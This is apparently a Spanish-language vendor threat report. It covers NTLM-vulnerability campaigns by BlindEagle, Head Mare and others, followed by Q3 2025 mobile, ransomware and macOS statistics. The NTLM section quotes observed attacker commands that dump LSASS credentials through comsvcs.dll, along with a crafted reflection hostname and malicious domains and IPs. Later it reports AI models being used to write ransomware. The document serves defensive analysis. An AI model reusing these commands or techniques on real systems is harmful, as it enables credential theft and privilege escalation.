Campaña de BlindEagle que distribuye Remcos RAT mediante CVE‑2024‑43451

BlindEagle es un actor de amenazas latinoamericano conocido por campañas versátiles que combinan espionaje y ataques financieros. A finales de noviembre de 2024, el grupo inició una nueva campaña dirigida a entidades colombianas, en la que utilizó la vulnerabilidad CVE‑2024‑43451 en Windows para distribuir Remcos RAT. BlindEagle creó archivos .url como nuevo dropper inicial. Estos archivos se enviaban por correo de phishing, en los que el grupo se hacía pasar por entidades gubernamentales y judiciales colombianas, y utilizaba supuestos problemas legales como señuelo. Una vez que los destinatarios accedían a descargar el archivo malicioso, cualquier interacción con él generaba una solicitud a un servidor WebDAV bajo control de los atacantes, desde donde se descargaba y ejecutaba una versión modificada del troyano Remcos RAT. Esta versión incluía un módulo dedicado al robo de credenciales de billeteras cripto.

Los atacantes ejecutaban el malware de forma automática al especificar el puerto 80 en la ruta UNC. Esto permitía que la conexión se realizara mediante el protocolo WebDAV sobre HTTP y eludiera la conexión mediante SMB. Este tipo de conexión también provoca la filtración de hashes NTLM. Sin embargo, no hemos observado que se haya hecho un uso posterior de esos hashes.

Después de esta campaña y durante todo 2025, el grupo siguió lanzando múltiples ataques con el mismo vector inicial (archivos .url) y continuó distribuyendo Remcos RAT.

Detectamos más de 60 archivos .url utilizados como droppers iniciales en las campañas de BlindEagle. Estos archivos se enviaban en correos que suplantaban a autoridades judiciales colombianas. Todos se comunicaban mediante WebDAV con servidores controlados por el grupo e iniciaban una cadena de ataque que utilizaba ShadowLadder o Smoke Loader hasta cargar Remcos RAT en memoria.

Campañas de Head Mare contra objetivos rusos que abusan de CVE‑2024‑43451

Otra campaña detectada tras la divulgación de Microsoft involucra al grupo hacktivista Head Mare, conocido por perpetrar ataques contra objetivos rusos y bielorrusos.

En campañas anteriores, Head Mare explotó diversas vulnerabilidades como parte de sus técnicas para obtener acceso inicial a la infraestructura de sus víctimas. En esta ocasión se valió de CVE‑2024‑43451. El grupo distribuía un archivo ZIP por correo de phishing con el nombre Договор на предоставление услуг №2024‑34291 (Acuerdo de prestación de servicios núm. 2024‑34291). Este archivo contenía un archivo .url llamado “Сопроводительное письмо.docx” (“Carta de presentación.docx”).

El archivo .url se conectaba a un servidor SMB remoto controlado por el grupo bajo el dominio:

document-file[.]ru/files/documents/zakupki/MicrosoftWord.exe

El dominio resolvía a la dirección IP 45.87.246.40, perteneciente al ASN 212165, que el grupo había utilizado en campañas sobre las que nuestro equipo ya había informado.

Para alcanzar sus objetivos en las empresas seleccionadas, Head Mare utilizó varios recursos de acceso público, incluidos programas de código abierto, para realizar movimientos laterales y escalada de privilegios mediante el reenvío de los hashes expuestos. Entre las herramientas detectadas en ataques anteriores se encuentran Mimikatz, Secretsdump, WMIExec y SMBExec (las tres últimas del conjunto de herramientas Impacket).

En esta campaña detectamos intentos de explotación de la vulnerabilidad CVE‑2023‑38831 en WinRAR, que se había utilizado como vector de acceso inicial en una campaña sobre la que ya se había informado, y, en otros dos incidentes, observamos intentos de utilizar herramientas relacionadas con Impacket y SMBMap.

El ataque, además de recopilar hashes NTLM, incluía la distribución del malware PhantomCore, parte del arsenal del grupo.

CVE‑2025‑24054/CVE‑2025‑24071

CVE‑2025‑24071 y CVE‑2025‑24054, registradas al principio como vulnerabilidades distintas, pero más adelante consolidadas bajo el identificador CVE‑2025‑24054, describen una vulnerabilidad de filtración de hashes NTLM que afecta a varias versiones de Windows, entre ellas Windows 11 y Windows Server. La vulnerabilidad se explota, ante todo, mediante archivos diseñados de forma específica, como archivos .library‑ms, que provocan que el sistema inicie solicitudes de autenticación NTLM hacia servidores controlados por el atacante.

El modo de explotación es similar a CVE‑2024‑43451 y requiere poca o ninguna interacción del usuario (por ejemplo, previsualizar un archivo), lo que permite a los atacantes capturar hashes NTLMv2 y obtener acceso no autorizado o escalar privilegios dentro de la red. El escenario de explotación más habitual y extendido de esta vulnerabilidad se observa con archivos .library‑ms dentro de archivos ZIP/RAR, ya que resulta sencillo engañar a los usuarios para que los abran o previsualicen. En la mayoría de los incidentes que observamos, los atacantes utilizaron archivos ZIP como vector de distribución.

Distribución de troyanos en Rusia mediante CVE‑2025‑24054

En Rusia identificamos una campaña que distribuía archivos ZIP maliciosos con el asunto акт_выполненных_работ_апрель (certificado_de_finalización_de_trabajos_abril). Los archivos dentro de los ZIP se hacían pasar por hojas de cálculo .xls, pero en realidad eran archivos .library‑ms que iniciaban de forma automática una conexión con servidores controlados por los atacantes. Los archivos maliciosos tenían incrustada la misma dirección IP de servidor: 185.227.82.72.

Cuando se explotaba la vulnerabilidad, el archivo se conectaba de forma automática a ese servidor, que también alojaba versiones del troyano AveMaria (conocido también como Warzone) para su distribución. AveMaria es un troyano de acceso remoto (RAT) que otorga a los atacantes control remoto para ejecutar comandos, exfiltrar archivos, registrar pulsaciones de teclado y mantener la persistencia.

CVE‑2025‑33073

CVE‑2025‑33073 es una vulnerabilidad de reflexión NTLM de alta gravedad en el control de acceso del cliente SMB de Windows. Un atacante autenticado dentro de la red puede manipular la autenticación SMB, en especial mediante relay local, para forzar que el sistema de la víctima se autentique contra sí mismo como SYSTEM. Esto permite al atacante escalar privilegios y ejecutar código con el nivel más alto de permisos.

La vulnerabilidad se basa en un defecto en la forma en que Windows determina si una conexión es local o remota. Al crear un nombre de host DNS específico que se superpone de forma parcial con el nombre de la máquina, el atacante puede engañar al sistema para que interprete la solicitud de autenticación como si procediera de ese mismo host. Cuando esto ocurre, Windows cambia a un “modo de autenticación local”, que omite el intercambio habitual de desafío-respuesta NTLM e inyecta el token del usuario directo en el subsistema de seguridad del host. Si el atacante ha obligado a la víctima a conectarse al nombre de host manipulado, el token proporcionado es, en la práctica, el de la propia máquina, lo que le otorga acceso con privilegios en el propio host.

Este comportamiento surge porque el protocolo NTLM establece una marca especial y un ID de contexto cuando asume que el cliente y el servidor son la misma entidad. La manipulación del atacante provoca que el sistema operativo trate una solicitud externa como interna, por lo que el token inyectado se maneja como si fuera de confianza. Esta autorreflexión da pie a que el adversario actúe con privilegios de SYSTEM en la máquina objetivo.

Actividad sospechosa en Uzbekistán que involucra CVE‑2025‑33073

Detectamos actividad sospechosa que explota esta vulnerabilidad en un objetivo del sector financiero en Uzbekistán.

Obtuvimos un volcado de tráfico relacionado con esta actividad e identificamos varias cadenas dentro del mismo que corresponden a fragmentos asociados con la autenticación NTLM sobre SMB. Esto incluía negociaciones de autenticación con dialectos SMB, mensajes NTLMSSP, nombres de host y dominios.

En particular, destacan los siguientes indicadores:

• El nombre de host localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA, un nombre manipulado utilizado para engañar a Windows y hacer que trate la autenticación como local.
• La presencia del recurso compartido IPC$, habitual en ataques de NTLM relay/reflection, ya que permite al atacante iniciar la autenticación y, luego, realizar acciones reutilizando esa sesión autenticada.

El incidente comenzaba con la explotación de la vulnerabilidad de reflexión NTLM. El atacante utilizaba un registro DNS manipulado para forzar que el host se autenticara con sí mismo y así obtener un token de SYSTEM. Después, verificaba si contaba con privilegios suficientes para ejecutar código mediante archivos por lotes (batch) que lanzaban comandos sencillos como whoami:

%COMSPEC% /Q /c echo whoami ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

A continuación, se establecía persistencia mediante la creación de una entrada de servicio sospechosa en el registro, en la ruta:

reg:\\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\YlHXQbXO

Habiendo obtenido los privilegios de SYSTEM, el atacante intentaba varios métodos para volcar la memoria de LSASS (Local Security Authority Subsystem Service):

1. Usando rundll32.exe:

   C:\Windows\system32\cmd.exe /Q /c CMD.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, #+0000^24 ^%B \Windows\Temp\vdpk2Y.sav full

   El comando localiza el proceso lsass.exe, que almacena credenciales en memoria, obtiene su PID e invoca una función interna de comsvcs.dll para volcar la memoria de LSASS y guardarla. Esta técnica se utiliza en etapas posteriores a la explotación (por ejemplo, con Mimikatz u otras herramientas de “living off the land”).

2. Cargando una DLL temporal (BDjnNmiX.dll):

   C:\Windows\system32\cmd.exe /Q /c cMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tAsKLISt /fi "Imagename eq lSAss.ex*" | find "lsass""') do rundll32.exe C:\Windows\Temp\BDjnNmiX.dll #+0000^24 ^%B \Windows\Temp\sFp3bL291.tar.log full

   El comando intenta volcar de nuevo la memoria de LSASS, pero esta vez mediante una DLL personalizada.

3. Ejecutando un script de PowerShell codificado en Base64:
   El script utiliza la funcion MiniDumpWriteDump que realiza un volcado de un determinado proceso que ejecuta en memoria (en este caso LSASS) al disco, de forma similar a la ejecución de procdump.exe.

Varios minutos después, el atacante intentó realizar movimiento lateral escribiendo en el recurso compartido administrativo de otro host, pero el intento falló. No observamos más actividad posterior.

Protección y recomendaciones

Deshabilitar o limitar NTLM

Mientras NTLM continúe habilitado, los atacantes podrán explotar vulnerabilidades en estos métodos de autenticación heredados. Deshabilitar NTLM o, como mínimo, limitar su uso a sistemas específicos y críticos reduce los puntos vulnerables. Este cambio debe acompañarse de una auditoría estricta para identificar todos los sistemas y aplicaciones que aún dependen de NTLM, a fin de garantizar una transición segura y sin interrupciones.

Implementar el firmado de mensajes

NTLM funciona como capa de autenticación sobre protocolos de aplicación como SMB, LDAP y HTTP, entre otros. Muchos de estos protocolos permiten habilitar firmado (signing) en las comunicaciones. Una de las formas más eficaces de mitigar los ataques de relay NTLM consiste en habilitar el firmado en SMB y LDAP. Estas funciones de seguridad garantizan que todos los mensajes entre cliente y servidor sean firmados, lo que impide que los atacantes manipulen o retransmitan el tráfico de autenticación. Sin firmado, los atacantes pueden interceptar y reutilizar credenciales NTLM para obtener acceso no autorizado a los recursos de la red.

Habilitar Extended Protection for Authentication (EPA)

EPA vincula la autenticación NTLM con la sesión TLS o SSL subyacente, y asegura que las credenciales capturadas no se puedan reutilizar en contextos no autorizados. Esta validación adicional puede aplicarse a servicios como servidores web y LDAP, lo que complica bastante la ejecución de ataques de relay NTLM.

Supervisar y auditar el tráfico y los registros de autenticación NTLM

La revisión periódica de los registros de autenticación NTLM ayuda a identificar patrones anómalos, como direcciones IP de origen inusuales o un número elevado de intentos de autenticación fallidos, que pueden indicar ataques en curso. El uso de herramientas SIEM y de monitoreo de red para rastrear tráfico NTLM sospechoso mejora la detección temprana de amenazas y permite responder con mayor rapidez.

Conclusiones

En 2025, NTLM sigue enraizado en los entornos Windows y continúa ofreciendo a los cibercriminales oportunidades para explotar debilidades conocidas desde hace años. Aunque Microsoft anunció planes para retirarlo, la presencia generalizada del protocolo en sistemas heredados y redes empresariales lo mantiene vigente y expuesto a riesgos. Los actores de amenazas aprovechan fallas recién descubiertas para perfeccionar ataques basados en reenvío de credenciales, escalar privilegios y desplazarse de forma lateral dentro de las redes, lo que demuestra que NTLM sigue representando un riesgo de seguridad importante.

El aumento de incidentes que se enfocan en NTLM observado a lo largo de 2025 refleja los crecientes riesgos que supone depender de mecanismos de autenticación obsoletos. Para mitigar estas amenazas, las organizaciones deben acelerar los esfuerzos de descontinuación, aplicar parches de forma regular y adoptar marcos de protección de identidad más robustos. De lo contrario, NTLM continuará siendo un punto de entrada recurrente y de fácil explotación para los atacantes.

Desarrollo de las amenazas informáticas en el tercer trimestre de 2025. Estadísticas móviles
Desarrollo de las amenazas informáticas en el tercer trimestre de 2025. Estadísticas de computadoras personales

Prefacio

En el tercer trimestre de 2025, modificamos la metodología para calcular los indicadores estadísticos que se basan en Kaspersky Security Network (KSN). Estos cambios afectaron todas las secciones del informe excepto la estadística de paquetes de instalación, que permaneció inalterada.

Con el fin de mostrar la dinámica de cambios entre los períodos cubiertos por diferentes informes, recalculamos también los datos de trimestres anteriores. Por esta razón, es posible que difieran en gran medida de las cifras publicadas en ocasiones anteriores. Los informes futuros se elaborarán con esta nueva metodología, lo que permitirá comparar correctamente los datos con los presentados en este artículo.

Kaspersky Security Network (KSN) es una red global que analiza la información sobre amenazas, proporcionada de forma anónima y voluntaria por los usuarios de las soluciones de Kaspersky. Las estadísticas de este informe se basan en los datos de KSN, salvo que se indique lo contrario.

Cifras del trimestre

Según Kaspersky Security Network, en el tercer trimestre de 2025:

• Se neutralizaron 3 470 000 ataques que empleaban software móvil malicioso, publicitario o no deseado.
• Entre el software malicioso para dispositivos móviles, los troyanos fueron la amenaza más común, afectando al 15,78% del total de usuarios atacados que utilizan soluciones de Kaspersky.
• Se detectaron más de 197 000 paquetes de instalación maliciosos, de los cuales:
  • 52 723 paquetes eran troyanos bancarios para móviles;
  • 1 564 eran troyanos para móviles de tipo ransomware.

Aspectos destacados del trimestre

En el tercer trimestre, el número de ataques a dispositivos móviles con software malicioso, publicitario o no deseado, calculado según las nuevas directrices, alcanzó los 3,47 millones. Esta cifra es ligeramente inferior a los 3,51 millones de ataques registrados en el periodo anterior.

Número de ataques a los usuarios de soluciones móviles de Kaspersky, segundo trimestre de 2024 – tercer trimestre de 2025 (descargar)

A principios del trimestre, un usuario reportó la presencia de anuncios en todos los navegadores de su smartphone. Llevamos a cabo una investigación y descubrimos una nueva versión de la puerta trasera preinstalada BADBOX. Esta puerta trasera se basa en un cargador de múltiples niveles ubicado en la biblioteca maliciosa librescache.so, que el framework del sistema carga en memoria. Gracias a esto, una copia del troyano se inyectaba en cada proceso ejecutado en el dispositivo.

Otro hallazgo interesante fue Trojan-Downloader.AndroidOS.Agent.no, integrado en mods de mensajeros y otras aplicaciones. Este componente descargaba en el dispositivo el malware Trojan-Clicker.AndroidOS.Agent.bl, que a su vez recibía desde un servidor una URL con publicidad, la abría en una ventana WebView invisible y, mediante algoritmos de aprendizaje automático, encontraba y hacía clic en el botón de cierre. De esta forma, los estafadores utilizaban el dispositivo del usuario afectado para inflar de forma artificial las métricas de visualización de publicidad.

Estadísticas de amenazas móviles

En el tercer trimestre, las soluciones de Kaspersky detectaron 197 738 muestras de software malicioso y no deseado para Android, 55 000 más que en el período anterior.

Número de paquetes de instalación maliciosos y potencialmente no deseados detectados, tercer trimestre de 2024 – tercer trimestre de 2025 (descargar)

La distribución por tipo de los paquetes detectados fue la siguiente:

Programas móviles detectados distribuidos por tipo, segundo* y tercer trimestre de 2025 (descargar)

* Los cambios en la metodología de cálculo no afectan esta métrica, aunque los datos del trimestre anterior pueden tener leves diferencias con los publicados con anterioridad debido a la revisión retrospectiva de algunos veredictos.

La proporción de troyanos bancarios tuvo una leve disminución, lo que se debió al aumento de otros tipos de paquetes maliciosos más que a una reducción en su número absoluto. No obstante, los troyanos bancarios (entre los que siguen predominando los paquetes de Mamont) siguen manteniendo el primer lugar. A esto se suma el aumento en el número de troyanos de tipo dropper, que en este caso son en su mayoría droppers para troyanos bancarios.

Proporción de usuarios atacados por un tipo específico de software malicioso o potencialmente no deseado, del total de usuarios de productos móviles de Kaspersky atacados, segundo y tercer trimestres de 2025 (descargar)

* El total puede superar el 100 % si los mismos usuarios enfrentaron múltiples tipos de ataques.

Según el número de usuarios atacados, las aplicaciones publicitarias se encuentran en primer lugar con un amplio margen por encima del segundo. Las más comunes son HiddenAd (56,3 %) y MobiDash (27,4 %). En segundo lugar se encuentran aplicaciones no deseadas clasificadas como RiskTool, cuyo crecimiento se debe en gran parte a la difusión del módulo Revpn, que monetiza el acceso a internet del usuario convirtiendo su dispositivo en un punto de salida de VPN. Como era de esperarse, los troyanos más populares siguen siendo Triada (55,8 %) y Fakemoney (24,6 %). El porcentaje de usuarios que se enfrentaron a ellos no ha experimentado cambios significativos.

TOP 20 de aplicaciones maliciosas móviles

El siguiente ranking de aplicaciones maliciosas no incluye programas potencialmente peligrosos o no deseados, como RiskTool y software publicitario.

* Porcentaje de usuarios únicos que se enfrentaron a esta amenaza, del total de usuarios de soluciones móviles de Kaspersky atacados.
Las primeras posiciones en la lista del malware más difundido las ocupan versiones modificadas de los mensajeros Triada.ii, Triada.fe, Triada.gn y otros. La puerta trasera preinstalada Triada.z ocupó el quinto lugar, por debajo de las aplicaciones Fakemoney, que recopilan datos personales de los usuarios con el pretexto de procesar pagos o servicios financieros, todos ellos falsos. El dropper Agent.gen, ubicado en el noveno lugar, es un archivo ELF ofuscado relacionado con el troyano bancario Coper.c, que está en el puesto que sigue a DangerousObject.Multi.Generic.

Malware regional

En esta sección, describimos programas maliciosos que tienen como objetivo principal de sus ataques a los usuarios de países específicos.

* País donde el programa malicioso está más activo.
** Porcentaje de usuarios únicos que se enfrentaron a esta variante del troyano en el país, del total de usuarios de soluciones móviles de Kaspersky atacados por esta variante.

En Turquía, los troyanos bancarios siguen operando, sobre todo Coper. Los usuarios en India también son objetivo de los atacantes que distribuyen este tipo de software. En particular, el troyano bancario Rewardsteal está activo en el país. En Irán, ha desplegado su actividad el backdoor Teledoor, integrado en un cliente falso para Telegram.

Es notable el brusco aumento de los ataques del troyano extorsionador Rkor en Alemania. En trimestres anteriores, su actividad fue mucho menor, quizá porque los estafadores encontraron un nuevo medio para distribuir aplicaciones maliciosas entre los usuarios.

Troyanos bancarios móviles

En el tercer trimestre de 2025, se detectaron 52 723 paquetes de instalación de troyanos bancarios móviles, 10 000 más que en el segundo trimestre.

Número de paquetes de instalación de troyanos bancarios móviles detectados por Kaspersky, tercer trimestre de 2024 – tercer trimestre de 2025 (descargar)

La participación del troyano Mamont en el total de troyanos bancarios aumentó un poco y alcanzó el 61,85%. Sin embargo, por la proporción de usuarios atacados, Coper ocupó el primer lugar, ya que en la mayoría de los ataques se utilizó la misma variante. Las variantes de Mamont ocuparon varios puestos a partir del segundo, porque en cada ataque se utilizaron diferentes versiones. Aun así, el número total de usuarios atacados por la familia Mamont supera al registrado por Coper.

TOP 10 de troyanos bancarios móviles

* Porcentaje de usuarios únicos que se enfrentaron a esta amenaza, del total de usuarios de soluciones de seguridad móviles de Kaspersky atacados por troyanos bancarios.

Troyanos extorsionadores para móviles

Debido a la reciente intensificación de las actividades de los troyanos extorsionadores para móviles en Alemania, mencionada en la sección “Malware regional”, también decidimos incluir estadísticas sobre este tipo de amenazas. En el tercer trimestre, el número de paquetes de instalación de troyanos extorsionadores aumentó en más del doble, alcanzando un total de 1 564.

* Porcentaje de usuarios únicos que se han enfrentado a este malware, del total de usuarios de las soluciones de seguridad móviles de Kaspersky que han sido atacados por troyanos extorsionadores.

Desarrollo de las amenazas informáticas en el tercer trimestre de 2025. Estadísticas móviles
Desarrollo de las amenazas informáticas en el tercer trimestre de 2025. Estadísticas de computadoras personales

Cifras del trimestre

En el tercer trimestre de 2025:

• Las soluciones de Kaspersky bloquearon más de 389 millones de ataques procedentes de diversos recursos de Internet;
• El antivirus web reaccionó a 52 millones de enlaces únicos;
• El antivirus de archivos bloqueó más de 21 millones de objetos maliciosos y potencialmente no deseados;
• Se detectaron 2200 nuevas modificaciones de cifradores;
• Casi 85 000 usuarios se enfrentaron a ataques de cifradores;
• El 15% de todas las víctimas de cifradores, cuyos datos se publicaron en los sitios web DLS (Data Leak Site) de los grupos, sufrieron daños infringidos por Qilin;
• Más de 254 mil usuarios se enfrentaron a criptomineros.

Programas cifradores maliciosos

Principales tendencias y eventos del trimestre

Éxitos de las fuerzas del orden

La Agencia Nacional contra el Crimen (NCA) del Reino Unido, en el marco de la investigación del ataque de cifrado que provocó fallos en muchos aeropuertos europeos en septiembre de 2025, arrestó al primer sospechoso. No se han publicado detalles, ya que la investigación aún está en curso. Según los datos proporcionados por el investigador de seguridad Kevin Beaumont, el ataque se llevó a cabo utilizando el cifrador HardBit, que el experto describió como primitivo y sin su propio DLS.

El Departamento de Justicia de EE.UU. presentó cargos contra el administrador de los grupos extorsionadores LockerGoga, MegaCortex y Nefilim. Figuraba en las listas de personas buscadas tanto por el FBI como por la Unión Europea, y sus ataques causaron millones de dólares de daños.

Las autoridades estadounidenses también incautaron más de 2,8 millones de dólares en criptomonedas, 70 000 dólares en efectivo y un coche de lujo al sospechoso de distribuir el cifrador Zeppelin. La trama delictiva incluía el robo de datos, el cifrado de archivos y la extorsión, y afectó a numerosas organizaciones de todo el mundo.

El FBI, el Servicio de Investigaciones de Seguridad Interna (HSI), el Servicio de Impuestos Internos (IRS) y las fuerzas del orden de varios otros países llevaron a cabo una operación internacional coordinada en la que se desmanteló la infraestructura del ransonware BlackSuit. Se incautaron cuatro servidores, nueve dominios y 1,09 millones de dólares en criptomonedas. La operación tenía como objetivo desestabilizar el ecosistema del software malicioso y proteger la infraestructura crítica de los Estados Unidos.

Vulnerabilidades y ataques

Ataques a SonicWall a través de SSL VPN

Desde finales de julio, los investigadores han venido registrado un aumento en el número de ataques del grupo Akira a los cortafuegos SonicWall compatibles con SSL VPN. La empresa SonicWall relaciona los incidentes con la vulnerabilidad CVE-2024-40766, ya corregida, que permitía a usuarios no autorizados acceder a los recursos del sistema. Con su ayuda, los atacantes podían robar credenciales y luego utilizarlas para acceder incluso a dispositivos ya actualizados con el parche correspondiente. Los atacantes lograban eludir la autenticación multifactor (MFA) habilitada en los dispositivos.

SonicWall recomienda cambiar todas las contraseñas y actualizar el firmware de SonicOS.

Scattered Spider hackea VMware ESXi mediante ingeniería social

El grupo Scattered Spider (UNC3944) ataca entornos virtuales VMware haciéndose pasar por empleados de la empresa. Los atacantes llaman al servicio de asistencia técnica y convencen a los empleados para que cambien la contraseña de Active Directory. Una vez que obtienen acceso a vCenter, los atacantes activan SSH en los servidores ESXi, extraen la base de datos NTDS.dit y, en la fase final del ataque, ejecutan un ransomware que cifra todas las máquinas virtuales.

Explotación de la vulnerabilidad de Microsoft SharePoint

A finales de julio, los investigadores detectaron ataques a servidores SharePoint que utilizaban la cadena de vulnerabilidades ToolShell. Durante la investigación de la campaña, que afectó a más de 140 organizaciones en todo el mundo, se descubrió el ransomware 4L4MD4R, basado en un código público conocido como Mauri870. El malware está escrito en Go y empaquetado con UPX, y exige un rescate de 0,005 BTC.

Uso de la IA en los cifradores

Un ciberdelincuente británico creó y lanzó una plataforma de ransomware como servicio (RaaS) con la ayuda del modelo de IA Claude. Este generó el código, que incorpora técnicas antidepuración, cifrado mediante los algoritmos ChaCha20 y RSA, funciones para eliminar copias de seguridad ocultas y la capacidad de cifrar archivos en redes.

Anthropic señala que el atacante dependía casi por completo de Claude, ya que no tenía los conocimientos técnicos necesarios para proporcionar asistencia técnica a sus clientes. El atacante vendía kits de software malicioso ya preparados en la dark web por entre 400 y 1200 dólares.

Además, los investigadores descubrieron un cifrador que utilizaba el modelo LLM directamente durante el ataque y lo bautizaron PromptLock. El programa está escrito en Go. A partir de prompts predefinidos, genera scripts en Lua de forma dinámica para robar y cifrar datos en sistemas Windows, macOS y Linux. Para el cifrado utiliza el algoritmo SPECK-128, poco utilizado por los cifradores.

Más adelante, los científicos de la Escuela de Ingeniería Tandon de la Universidad de Nueva York señalaron la probabilidad de que PromptLock se basara en el proyecto educativo Ransomware 3.0, descrito en su publicación.

Las agrupaciones más activas

En esta sección se presentan datos sobre los grupos de extorsión más activos por el número de víctimas añadidas a su DLS (sitio de filtración de datos). Al igual que en el trimestre anterior, el grupo más “productivo” fue Qilin, cuya cuota aumentó en 1,89 puntos porcentuales hasta alcanzar el 14,96 %. El cifrador Clop redujo su actividad, mientras que la cuota de Akira (10,02 %) tuvo un ligero aumento. El grupo INC Ransom (8,15 %), activo desde 2023, ascendió al tercer lugar.

Porcentaje de víctimas de este grupo (según datos de su sitio web DLS), del total víctimas de todos los grupos publicados en todos los sitios web DLS analizados durante el período cubierto por el informe (descargar)

Número de nuevas modificaciones

En el tercer trimestre, las soluciones de Kaspersky detectaron 4 nuevas familias y 2259 modificaciones de cifradores, casi un tercio más que en el segundo trimestre de 2025 y ligeramente más que en el mismo trimestre de 2024.

Número de nuevas modificaciones de cifradores, tercer trimestre de 2024 – tercer trimestre de 2025 (descargar)

Número de usuarios atacados por troyanos cifradores

Durante el período analizado, nuestras soluciones protegieron a 84 903 usuarios únicos contra los cifradores. La mayor actividad del software extorsionador se registró en julio, mientras que agosto fue el mes más tranquilo.

Número de usuarios únicos atacados por troyanos cifradores, tercer trimestre de 2025 (descargar)

Distribución geográfica de los ataques

TOP 10 de países y territorios atacados por troyanos cifradores

En el tercer trimestre, la mayor proporción de usuarios atacados se registró en Israel (1,42 %). La mayor parte de los troyanos cifradores en este país se detectaron en agosto mediante análisis de comportamiento.

* En los cálculos hemos excluido a los países y territorios donde el número de usuarios de Kaspersky es relativamente bajo (menos de 50 000).
** Porcentaje de usuarios únicos cuyos equipos han sido atacados por troyanos cifradores, del total de usuarios únicos de productos de Kaspersky en el país o territorio.

TOP 10 de las familias de troyanos cifradores más comunes

* Porcentaje de usuarios únicos de Kaspersky que han sido víctimas de ataques de una familia concreta de troyanos extorsionadores, respecto al número total de usuarios que han sido víctimas de ataques de troyanos extorsionadores.

Criptomineros

Número de nuevas modificaciones

En el tercer trimestre de 2025, las soluciones de Kaspersky detectaron 2863 nuevas modificaciones de criptomineros.

Número de nuevas modificaciones de criptomineros, tercer trimestre de 2025 (descargar)

Número de usuarios atacados por criptomineros

En el tercer trimestre, detectamos ataques con programas criptomineros en los equipos de 254 414 usuarios únicos de productos de Kaspersky en todo el mundo.

Número de usuarios únicos atacados por criptomineros, tercer trimestre de 2025 (descargar)

Distribución geográfica de los ataques

TOP 10 de países y territorios atacados por criptomineros

* En los cálculos hemos excluido a los países y territorios donde el número de usuarios de Kaspersky es relativamente bajo (menos de 50 000).
** Porcentaje de usuarios únicos cuyos equipos han sido atacados por criptomineros, del total de usuarios únicos de los productos de Kaspersky en el país o territorio.

Ataques contra macOS

En abril, los investigadores de la empresa Iru (antes Kandji) informaron sobre un nuevo programa espía llamado PasivRobber. A lo largo del tercer trimestre, nuestro equipo observó el desarrollo de esta familia. En las nuevas modificaciones aparecieron módulos ejecutables adicionales que no estaban presentes en las anteriores. Además, los atacantes comenzaron a utilizar técnicas de ofuscación para dificultar la detección de las muestras.

En julio informamos obre un criptominero que se propagaba mediante extensiones falsas del entorno de desarrollo Cursor AI para Visual Studio Code. En ese momento, el script JS malicioso descargaba la utilidad de acceso remoto ScreenConnect, a través de la cual se descargaban en el dispositivo de la víctima scripts VBS maliciosos destinados a robar criptomonedas. Más tarde, el investigador Michael Bocanegra informó sobre nuevas extensiones falsas para VSCode, en las que también se ejecutaba código JS malicioso. En esta ocasión, descargaba una carga maliciosa para macOS en forma de un cargador escrito en Rust, que a su vez instalaba un backdoor en el dispositivo de la víctima (probablemente destinado también al robo de criptomonedas) y permitía descargar módulos adicionales para recopilar información del sistema. El cargador Rust fue analizado en detalle por los investigadores de Iru.

En septiembre, los investigadores de Jamf informaron del descubrimiento de una versión hasta entonces desconocida del backdoor modular ChillyHell, descrito por primera vez en 2023. Cabe destacar que, en el momento de su descubrimiento, los archivos ejecutables del troyano estaban firmados con el certificado válido del desarrollador.

La nueva muestra estaba disponible en Dropbox desde 2021. Además de la funcionalidad de backdoor, también contiene un módulo que lleva a cabo el descifrado por fuerza bruta de las contraseñas de los usuarios existentes en el sistema.

A finales del tercer trimestre, los investigadores de Microsoft informaron que habían aparecido nuevas versiones del espía XCSSET, dirigido a los desarrolladores y que se propaga en proyectos Xcode infectados. En ellas aparecieron módulos adicionales para robar datos y afianzarse en el sistema.

TOP 20 de amenazas para macOS

Porcentaje* de usuarios únicos atacados por este malware, del total de usuarios de las soluciones de seguridad de Kaspersky para macOS atacados (descargar)

* Los datos del trimestre anterior pueden diferir un poco de los publicados en informes anteriores debido a la revisión retrospectiva de algunos veredictos.

El espía PasivRobber sigue intensificando sus actividades. Sus modificaciones ocupan los primeros puestos en la lista de los programas maliciosos más comunes para macOS. También figuran entre los más activos los troyanos Amos, dedicados al robo de contraseñas y datos de carteras criptográficas, y varias apps de publicidad. Los backdoors Backdoor.OSX.Agent.l, que ocupan el decimotercer lugar, son una variante del conocido malware de código abierto Mettle.

Distribución geográfica de las amenazas para macOS

TOP 10 de países y territorios por porcentaje de usuarios atacados

Estadísticas de amenazas para IoT

En esta sección se presentan las estadísticas de ataques a los honeypots de IoT de Kaspersky. La geolocalización del origen de los ataques se basa en las direcciones IP de los dispositivos atacantes.

En el tercer trimestre de 2025, tuvo lugar un ligero aumento de la proporción de dispositivos que atacaron las trampas de Kaspersky a través del protocolo SSH.

Distribución de los servicios atacados, según el número de direcciones IP únicas de dispositivos que lanzaron los ataques (descargar)

Por el contrario, la proporción de ataques a través del protocolo SSH disminuyó ligeramente.

Distribución de las sesiones de actividad de los ciberdelincuentes con las trampas de Kaspersky (descargar)

TOP 10 de amenazas cargadas en dispositivos IoT:

Porcentaje de amenazas específicas cargadas en un dispositivo infectado tras un ataque exitoso, del total de amenazas cargadas (descargar)

En el tercer trimestre, las proporciones de los botnets NyaDrop y Mirai.b en el total de amenazas a IoT disminuyeron de forma notable, pero aumentó la actividad de algunos otros miembros de la familia Mirai, así como del botnet Gafgyt. Al mismo tiempo, como de costumbre, la mayor parte de la lista de los programas maliciosos más comunes está ocupada por diversas variantes de Mirai.

Ataques a los honeypots de IoT

Alemania y Estados Unidos siguen “liderando” la distribución de los ataques por el protocolo SSH. También ha experimentado un ligero aumento la proporción de ataques procedentes de Panamá e Irán.

Como es habitual, la mayoría de los ataques mediante el protocolo Telnet se realizaron desde territorio chino. Los dispositivos situados en India han bajado su nivel de actividad, y la participación de ataques desde Indonesia, en cambio, se ha incrementado.

Ataques mediante páginas web

